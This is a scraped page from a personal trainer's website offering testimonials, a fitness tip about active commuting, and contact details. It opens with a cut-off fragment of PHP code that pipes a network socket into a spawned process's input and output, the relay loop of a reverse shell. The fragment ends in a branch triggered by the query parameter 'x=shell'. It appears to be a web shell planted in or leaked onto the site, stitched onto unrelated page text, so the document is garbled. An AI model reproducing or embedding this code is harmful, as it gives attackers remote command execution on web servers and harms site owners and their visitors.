$pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);} if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);} if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}} elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){?>

personal trainer qualifications

"The level of professionalism Matt brings to every session is amazing. You gain the ability to achieve your fitness goals, you gain the information to make healthier lifestyle choices and last but not least, you gain a lasting friend. "
Chris R
See all client testimonials

Personal Training Blog & Resources

Health & fitness tips

Get Active commuting to Work

Build exercise into your commute to and/or from work. Run, Cycle, Walk all or some of the journey. Get off the bus a stop early, park further from work, keep change of fresh clothes at work etc. Great for body and mind and saves money too.

See all tips

Facebook | Youtube | Twitter

© Matt Swierzynski 2011
Personal trainer in Kirklees (including Huddersfield and Holmfirth) & Calderdale (including Halifax and Elland)
Email: matt@mattswaz.co.uk
Tel: 07936 654 876
Admin Log-in